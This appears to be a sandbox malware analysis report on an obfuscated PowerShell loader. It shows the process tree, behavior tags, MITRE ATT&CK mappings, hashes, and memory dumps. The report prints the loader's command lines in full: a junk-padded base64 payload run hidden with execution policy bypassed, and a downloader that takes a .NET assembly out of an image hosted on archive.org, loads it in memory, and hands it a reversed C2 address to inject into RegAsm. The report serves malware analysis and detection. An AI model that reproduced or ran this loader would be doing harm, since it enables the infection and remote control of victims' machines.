⇍YgBs㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍XQ㉯ ⫏ ㇀〷 ⇍6㉯ ⫏ ㇀〷 ⇍Do㉯ ⫏ ㇀〷 ⇍T㉯ ⫏ ㇀〷 ⇍Bv㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍o㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍YwBv㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍bQBh㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍BC㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍KQ㉯ ⫏ ㇀〷 ⇍7㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍B5㉯ ⫏ ㇀〷 ⇍H㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍ZQ㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍D0㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍bwBh㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍ZQBk㉯ ⫏ ㇀〷 ⇍EE㉯ ⫏ ㇀〷 ⇍cwBz㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bQBi㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍eQ㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍Ec㉯ ⫏ ㇀〷 ⇍ZQB0㉯ ⫏ ㇀〷 ⇍FQ㉯ ⫏ ㇀〷 ⇍eQBw㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍K㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍n㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍bgBs㉯ ⫏ ㇀〷 ⇍Gk㉯ ⫏ ㇀〷 ⇍Yg㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍Ek㉯ ⫏ ㇀〷 ⇍Tw㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍Eg㉯ ⫏ ㇀〷 ⇍bwBt㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍Jw㉯ ⫏ ㇀〷 ⇍p㉯ ⫏ ㇀〷 ⇍Ds㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍Bt㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bo㉯ ⫏ ㇀〷 ⇍G8㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍D0㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍eQBw㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍LgBH㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BN㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bo㉯ ⫏ ㇀〷 ⇍G8㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍o㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍VgBB㉯ ⫏ ㇀〷 ⇍Ek㉯ ⫏ ㇀〷 ⇍Jw㉯ ⫏ ㇀〷 ⇍p㉯ ⫏ ㇀〷 ⇍C4㉯ ⫏ ㇀〷 ⇍SQBu㉯ ⫏ ㇀〷 ⇍HY㉯ ⫏ ㇀〷 ⇍bwBr㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍K㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍dQBs㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍L㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍Fs㉯ ⫏ ㇀〷 ⇍bwBi㉯ ⫏ ㇀〷 ⇍Go㉯ ⫏ ㇀〷 ⇍ZQBj㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍WwBd㉯ ⫏ ㇀〷 ⇍F0㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍o㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍B4㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍LgBO㉯ ⫏ ㇀〷 ⇍E0㉯ ⫏ ㇀〷 ⇍RQBS㉯ ⫏ ㇀〷 ⇍C8㉯ ⫏ ㇀〷 ⇍M㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍w㉯ ⫏ ㇀〷 ⇍DY㉯ ⫏ ㇀〷 ⇍Lw㉯ ⫏ ㇀〷 ⇍4㉯ ⫏ ㇀〷 ⇍DU㉯ ⫏ ㇀〷 ⇍MQ㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍DQ㉯ ⫏ ㇀〷 ⇍Ng㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍DM㉯ ⫏ ㇀〷 ⇍Lg㉯ ⫏ ㇀〷 ⇍y㉯ ⫏ ㇀〷 ⇍Dk㉯ ⫏ ㇀〷 ⇍MQ㉯ ⫏ ㇀〷 ⇍v㉯ ⫏ ㇀〷 ⇍C8㉯ ⫏ ㇀〷 ⇍OgBw㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bo㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍s㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍JwBk㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍cwBh㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍aQB2㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍Bv㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍s㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍JwBk㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍cwBh㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍aQB2㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍Bv㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍s㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍JwBk㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍cwBh㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍aQB2㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍Bv㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍L㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍n㉯ ⫏ ㇀〷 ⇍FI㉯ ⫏ ㇀〷 ⇍ZQBn㉯ ⫏ ㇀〷 ⇍EE㉯ ⫏ ㇀〷 ⇍cwBt㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍L㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍n㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍KQ㉯ ⫏ ㇀〷 ⇍p㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㉯ ⫏ ㇀〷 ⇍','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NMER/006/851.46.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f1958e9c7b05767cbd5f953bd44f5d13

SHA1
a06cd3023e9856fb4ba85ca4c23324f9ddbcd0ae

SHA256
af7bceab29b03364801afdba4f7f313e9653688e1d2cd7c9cd99fc4963990f2b

SHA512
3ea6587c1740915975941ba7aa93546897062ca16b52b481e9abe389948e4689a6b37fd9122214b064052ebaca98d303afe5d489f83fd1576e166540e59a9299

Download Submit
memory/2580-4-0x000007FEF611E000-0x000007FEF611F000-memory.dmp

Filesize
4KB

Download
memory/2580-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2580-5-0x000000001B470000-0x000000001B752000-memory.dmp

Filesize
2.9MB

Download
memory/2580-7-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

Filesize
9.6MB

Download
memory/2580-8-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

Filesize
9.6MB

Download
memory/2580-10-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

Filesize
9.6MB

Download
memory/2580-9-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

Filesize
9.6MB

Download
memory/2580-11-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

Filesize
9.6MB

Download
memory/2580-17-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing